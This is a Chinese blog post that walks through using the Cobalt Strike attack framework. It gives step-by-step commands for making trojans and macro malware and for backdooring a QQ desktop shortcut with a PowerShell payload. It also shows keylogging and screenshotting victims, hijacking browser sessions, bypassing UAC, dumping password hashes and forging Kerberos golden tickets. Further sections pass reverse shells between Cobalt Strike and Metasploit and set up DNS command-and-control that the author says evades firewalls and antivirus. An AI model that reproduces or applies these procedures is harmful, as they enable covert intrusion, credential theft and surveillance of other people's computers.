cobaltstrike3.5使用记录

参考链接：

https://www.ezreal.net/archives/166.html
http://blog.cobaltstrike.com/category/cobalt-strike-2/  cobaltstrike作者博客
https://wujunze.com/wooyun/drops/Cobalt%20Strike%20之团队服务器的搭建与DNS通讯演示.html 

　　 cobalt strike从3.0 开始，不再依赖于Metasploit框架而是作为一个独立的平台使用。本次服务器搭建过程使用cobaltstrike3.8。3.0之前的版本，teamserver搭建过程则需要安装配置msf，这里不在赘述。

一、服务器Teamserver搭建

（1）团队服务器上：

(VPS的话要写外网ip，并且可以进行端口映射,默认使用50050端口)

sudo ./teamserver 服务器IP 连接密码   

但是这个终端一关闭团队服务器也就关闭了，这里我们可以把他置于后台来运行:

nohup ./teamserver IP 密码 &

这样就可以了，这个目录下会生成一个nohup.out的文件

注意

1.内存使用超过%50 无法启动java虚拟机。
2.3.0之前的版本，结束Cobalt Strike的时候也要同时结束所有 msfrpcd 进程，否则下次会启动不了。

（2）使用客户端连接

java  -jar cobaltstrike.jar 

个人在使用过程中，曾经出现过jvm内存不够的问题，导致服务器运行出错。可以添加swap虚拟内存，具体可以参考我的另外一篇博文：linux添加swap

二、Cobaltstrike的使用

1.创建Listener

Cobalt Strike首先需要创建一个Listener，用于监听会话和接受shell连接。依次点击 Cobalt Strike->Listeners ，点击Add便可以创建自己想要的Listener。

2. Attacks过程

（1）Packages

　　这个选项中包含了多种攻击方式。

HTML Application 　　　　　　 生成恶意的HTA木马文件；
MS Office Macro 　　　　　　  生成office宏病毒文件；
Payload Generator 　　　　　  生成各种语言版本的payload;
USB/CD AutoPlay 　　　　　　　生成利用自动播放运行的木马文件；
Windows Dropper 　　　　　　　捆绑器，能够对文档类进行捆绑；
Windows Executable 　　　　　生成可执行exe木马；
Windows Executable(S)　　　　生成无状态的可执行exe木马

举例

HTML Application 生成一个基于powershell的恶意HTA木马

选中attack–>packages–>HTML Application

选择基于powershell的HTA木马
点击Generate保存录即可生成一个HTA木马
当目标点击HTA木马后即可获得一个beacon

MS Office Macro 生成office宏病毒文件

可以参考：Office Phishing

（2）Web Drive-by（钓鱼攻击）

Manage　　　　　　　　　　　　 对开启的web服务进行管理；
Clone Site 　　 　　　　　　  克隆网站，可以记录受害者提交的数据；
Host File 　　　　　　　　　  提供一个文件下载，可以修改Mime信息；Host File 可以配合DNS欺骗实现挂马效果使用
PowerShell Web Delivery    类似于msf 的web_delivery ;
Signed Applet Attack 　　  使用java自签名的程序进行钓鱼攻击;
Smart Applet Attack 　　　　自动检测java版本并进行攻击，针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本；
System Profiler　　　　　　　用来获取一些系统信息，比如系统版本，Flash版本，浏览器版本等。
Spear Phish 　　　　　　　　 用来邮件钓鱼的模块

还有其他的模块其实都差不多
如Signed Applet Attack Smart Applet Attack和S.E.T的java攻击向量相同

powershell web-Drive-by制作快捷方式后门:

依次选择attack–>web-Drive-by–>powershell Drive-by
URI Path:/
Local Port:
Listener:saya
Laubch生成之后会输出一条语句这条语句在powershell运行会得到一个beacon但是一般人不会这么去运行
随便复制一个软件的快捷方式
这里以QQ快捷方式为例子目标，复制我们的powershell语句,起始位置清空,粘贴我们的语句，"应用",当目标点击快捷方式获得beacon

（3）View

Applications　　　　显示受害者机器的应用信息；
Credentials　　　　 显示受害者机器的凭证信息，能更方便的进行后续渗透；
Downloads 　　　　　文件下载；
Event Log　　　　　 可以看到事件日志，清楚的看到系统的事件,并且团队可以在这里聊天;
Keystrokes　　　　　查看键盘记录；
Proxy Pivots　　　 查看代理信息；
Screenshots　　　　 查看屏幕截图；
Script Console　　 在这里可以加载各种脚本以增强功能，脚本地址：https://github.com/rsmudge/cortana-scripts
Targets　　　　　　　查看目标；
Web Log　　　　　　　查看web日志。
Reporting　　　　　 主要就是出报告用的

（4）Beacon
　　Beacon可以选择通过DNS还是HTTP协议出口网络，你甚至可以在使用Beacon通讯过程中切换HTTP和DNS。其支持多主机连接，部署 好Beacon后提交一个要连回的域名或主机的列表，Beacon将通过这些主机轮询。目标网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的 通讯。通过种种方式获取shell以后（比如直接运行生成的exe），就可以使用beacon了

右击电脑，Interact，则可打开Beacon Console;为了能快速显示结果，可以设置
beacon>sleep 

1）Browserpivot
用户注入受害者浏览器进程，然后开启HTTP代理，之后就可以登录受害者登录的网站了。
使用方式

ps找到浏览器进程PID，如iexplorer.exe，为3452
注入进程：beacon> browserpivot 3452(PID) x64(架构)
注入浏览器进程成功之后，会显示： Browser Pivot HTTP proxy is at: xxx.xxx.xxx.xxx:端口号
设置本地HTTP浏览器代理

当然当被攻击者关闭浏览器的时候，代理也就失效了，关闭此代理可使用如下命令：browserpivot stop

2）Socks
　　直接开启socks4a代理，可以通过代理进行内网渗透测试。

开启socksbeacon>socks 9999
这里可以选择其中一台，右键Pivoting->SOCKS Server，则使用此台计算机开启socks代理。
配置proxychains.conf，添加： socks4 127.0.0.1 9999
然后就可以通过proxychains 等各种工具做内网渗透了。

　　msf中开启隧道使用（在连接数据库的情况下，msf会与本地数据库断开）

msf>setg Proxies socks:192.168.1.103.

关闭socks：beacon>socks stop

3）Screenshot

这里的screenshot可以截取受害者一定时间的屏幕截图，操作命令为：

beacon>screenshot [pid] <x86|x64> [run time in seconds]

或者： beacon>screenshot
然后打开View->Screenshots，则可以看到屏幕截图

4）Keylogger键盘记录器

keylogger [pid] <x86|x64>

然后打开View->Keystrokes，则可以看到键盘记录结果

如果不想使用命令行，可以直接选择受害者计算机（可多选）

5）powershell-import
这个功能在后渗透测试中很有用，可以导入各种powershell渗透框架，比如nishang的powerpreter，直接执行：

beacon> powershell-import

然后在文件浏览器里面选择 Powerpreter.psm1

或者直接执行：

powershell-import [/path/to/local/script.ps1]

进行导入，之后就可以使用powerpreter的各种模块了。

要执行某模块直接使用如下命令,比如：beacon> powershell Check-VM

6）kerberos

这里一共有三个模块，分别是：

kerberos_ccache_use 　　　　 从ccache文件中导入票据
kerberos_ticket_purge　　　　清除当前会话的票据
kerberos_ticket_use　　　　　从ticket文件中导入票据

使用mimikatz:

kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE

乌云关于kerberos也有相关文章
http://drops.wooyun.org/tips/7547 内网渗透中的mimikatz
http://drops.wooyun.org/tips/9591 域渗透的金之钥匙

7）BypassUAC
直接执行：

beacon> bypassuac

下面你就可以执行那些需要最高权限的操作了。

这一块在测试Win10的时候并没有成功，关于Win10的bypassuac可以参考这篇文章：

使用一个作者修改的powershell脚本invoke-BypassUAC.ps1

生成一个beacon后门：
Windows Executable
Listener:reverse_http
Output： Windows EXE

上传后门：
beacon> cd E:
beacon> upload /Users/evi1cg/Desktop/test.exe
加载powershell执行后门：

beacon> powershell-import /Users/evi1cg/Pentest/Powershell/MyShell/invoke-BypassUAC.ps1
beacon> powershell Invoke-BypassUAC -Command 'E:\test.exe'

使用那个破了的电脑的beacon读取密码：
beacon> sleep
beacon> wdigest
beacon> hashdump

三、高级用法

1、cobalt strike派生shell给metasploit

首先我们使用msf的reverse_tcp开启监听模式：

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport
lport =>
msf exploit(handler) > exploit

之后使用Cobalt Strike创建一个

windows/foreign/reverse_tcp Listener

其中ip为msf的ip地址，端口为msf所监听的端口。
然后选中计算机，右键->Spawn，选择刚刚创建的监听器：
msf中即可看到成功获取了meterpreter会话

2、Metasploit派生shell给cobaltstrike

你前提需要有一个meterpreter会话 ，然后我们使用这个模块

exploit/windows/local/payload_inject

功能是注入一个新的payload 到当前的session里面

我们先在cobaltstrike上创建一个监听器，等会用于接收msf派生的shell，这里我使用

windows/beacon_http/reverse_http

然后在msf中

use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(payload_inject) > set LHOST 192.168.81.135
LHOST => 192.168.81.135
msf exploit(payload_inject) > set LPORT
LPORT =>
msf exploit(payload_inject) > set SESSION
SESSION =>
msf exploit(payload_inject) > exploit
[*] Running module against WIN-I6HQQE1E7AG
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_http' for PID
msf exploit(payload_inject) >

解释下：
cobaltstrike的监听器我们使用的是：windows/beacon_http/reverse_http，
所以我们msf的payload要使用：windows/meterpreter/reverse_http

设置msf本地监听ip和端口为cobaltstrike机器的ip和端口

默认情况下，payload_inject执行之后会在本地产生一个新的handler，
由于我们已经有了一个，所以不需要在产生一个，所以这里我们设置
set DisablePayloadHandler true

如果出现错误，PID does not actually exist，可以设置一下注入进程的pid。set pid 进程号

3、通过DNS控制目标

　　Cobalt Strike有个beacons的功能，它可以通过DNS,HTTP,SMB来传输数据，下面我以DNS为例演示下。通过DNS来控制目标和渗透好处是不开端口，能绕过大部分防火墙，隐蔽性好等等。详细文章可参考这篇博文。

1. 域名设置　　

　（1）首先我们的有个域名，并且创建一条A记录指向我们的metasploit服务器，记住不要用CDN什么的

　（2）然后再创建2个或3个ns记录指向刚才创建的A记录。这样我们就可以通过dns找到我们的metasploit服务器了。

2. Cobalt Strike设置

在Cobalt Strike中我们添加一个listener

Edit Listener
Payload windows/beacon_dns/reverse_http
host
port 

　　HOST填写的是metasplit服务的IP，在点击Save的时候会要求填写你的NS记录，这里写入我们刚才创建的3个ns记录。接下来创建一个木马测试下。

3. 木马生成

在attack->packages中找到windows木马生成

Windows Executable
Listener: beacon(DNS)
Output: Windows EXE

Listener选择我们刚才创建的(有两个，选择有DNS的那个)，输出的有exe，带服务的EXE，dll等。

（连接方式以DNS生成的DLL木马能过掉很大一部分杀毒软件）

把生成的DNS.EXE放到虚拟机中运行。

回到Cobalt Strike打开beacons管理器发现有一个服务端响应了我们

右键是管理菜单，选择sleep设置相应的时间，然后选择interact来到操作界面

4.设置传输模式

　　传输有dns、dns-txt，http,smb四种，我们这里用的是DNS就在dns、dns-txt中选择把，前者传送的数据小后者传送的数据多。命令

beacon> mode dns-txt（这里可以用TAB补齐命令的）

这中方式好处在于比较对控制目标主机比较隐蔽，缺点在每次的命令的返回结果比较慢，在过防火墙方面还是不错的。

拓展

强化你的Cobalt strike之Cortana